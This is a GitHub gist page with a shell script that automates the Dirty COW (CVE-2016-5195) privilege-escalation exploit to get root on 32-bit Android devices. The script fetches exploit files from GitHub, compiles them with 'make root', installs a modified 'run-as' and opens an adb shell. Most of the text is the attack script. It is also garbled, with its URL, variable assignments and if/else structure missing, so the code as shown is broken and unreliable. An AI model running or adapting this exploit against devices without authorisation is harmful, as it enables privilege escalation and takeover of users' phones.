Skip to content

Instantly share code, notes, and snippets.

Forked from Arinerron/
Created March 31, 2017 21:12
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save pisculichi/a0988bdd8e56c76ba1737e3264bbac05 to your computer and use it in GitHub Desktop.
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
# Give the usual warning.
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
rm -f $workspacezip > /dev/null; # Remove zip if it exists
rm -rf $workspace > /dev/null; # Remove workspace if it exists
wget -O > /dev/null 2>&1;
if [ -f $workspacezip ];
echo "[INFO] Extracting exploit files...";
unzip -a $workspacezip -d $workspace > /dev/null;
rm -f $workspacezip; # Remove zip if it exists
echo "[ERR] Failed to download exploit files.";
exit 1;
if [ -d $workspace ];
cd $workspace;
directory=$PWD; # thx @tomdeboer!
cd CVE-2016-5195-master;
echo "[ERR] Failed to extract exploit files.";
exit 1;
# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
make root;
# Hooray!
echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf $directory; # Clean up workspace
echo "Done";
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
adb shell;
exit 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment